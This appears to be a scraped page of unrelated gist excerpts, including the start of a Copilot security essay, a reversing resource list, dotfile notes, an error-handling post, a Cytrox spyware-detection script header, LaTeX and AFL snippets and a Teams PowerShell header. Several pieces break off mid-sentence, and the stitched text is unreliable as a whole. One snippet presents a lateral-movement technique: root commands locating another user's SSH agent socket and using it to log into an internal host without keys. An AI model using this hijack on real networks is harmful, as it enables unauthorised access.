Roberto Natella rnatella

Risk Assessment of GitHub Copilot

0xabad1dea, July 2021

this is a rough draft and may be updated with more examples

GitHub was kind enough to grant me swift access to the Copilot test phase despite me @'ing them several hundred times about ICE. I would like to examine it not in terms of productivity, but security. How risky is it to allow an AI to write some or all of your code?

Ultimately, a human being must take responsibility for every line of code that is committed. AI should not be used for "responsibility washing." However, Copilot is a tool, and workers need their tools to be reliable. A carpenter doesn't have to

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh [email protected]

user@internal:~$ hostname -f
internal.company.tld

Assembly Language / Reversing / Malware Analysis / Game Hacking -resources

⭐Assembly Language

Modern x64 Assembly

https://www.youtube.com/playlist?list=PLKK11Ligqitg9MOX3-0tFT1Rmh3uJp7kA

I write scripts to:

combine a sequence of commands i could type manually, but am too lazy to (example: proxy-chrome)
turn commands i need frequently but can't remember into ones i can (example: ex, ssh-forward, ishostup, rmcaps)
do things recursively on a file tree (rgit, mvnrc, chres)
perform transformation operations on many files that are too complicated for find (svg2pdf, imgscale)
systematize workflows into a script (mvn-release)
procrastinate (gdwc)

The given examples are a subset of all the scripts I have in my doftiles that can be found in thrau/dotfiles.

Error Handling in Practice

My experience is mostly with Java backend services in the cloud, so the advice in this post will almost certainly be biased towards this kind of error handling. But hopefully, some of it will be generally applicable and help you maintain and debug your programs in the long run.

I don't claim that these are universal best practices, but I have found these to be useful as general guidelines. As always, use your best judgment and do things that make sense in your context.

Log the whole thing

In Java, a full exception is:

	#!/usr/bin/env bash
	#
	# Display host names of Cytrox spyware-hosting sites visited with Firefox
	# See: https://github.com/AmnestyTech/investigations/tree/master/2021-12-16_cytrox
	#
	# Diomidis Spinellis, May 2022
	#

	if [ -z "$1" ] ; then
	echo "Usage: $0 /path/to/Firefox/places.sqlite" 1>&2

	% This is for IEEEtran but should give an idea of how to do it for other styles
	% Preamble
	\usepackage{emoji}

	% [...]

	% This is the main piece; we just redefine the IEEEauthorrefmark command and
	% replace the symbols. We have to remove the \ensuremath{} because emoji don't
	% seem to work in math mode. You can of course replace these emoji with any of
	% the ones defined by the emoji package:

	If you have a list of edge hashes produced by AFL (e.g. from something like this):

	./afl-showmap -o foo.edges -t 500 -q -e -- ./program arg1

	Re-run the program using gdb to trace the sequence of block IDs:

	./collect_coverage.sh trace.txt ./program arg1

	Print edges in the trace:

	<#

	.Requires -version 2 - Connect-MicrosoftTeams and then Run the script in Powershell
	Updated on 28 Feb 2021

	.SYNOPSIS
	.\TeamsChannelMemberReport.ps1 - It Can Display all the Teams and its Channels and its members on a List

	Or It can Export to a CSV file
	With Export of Specific teams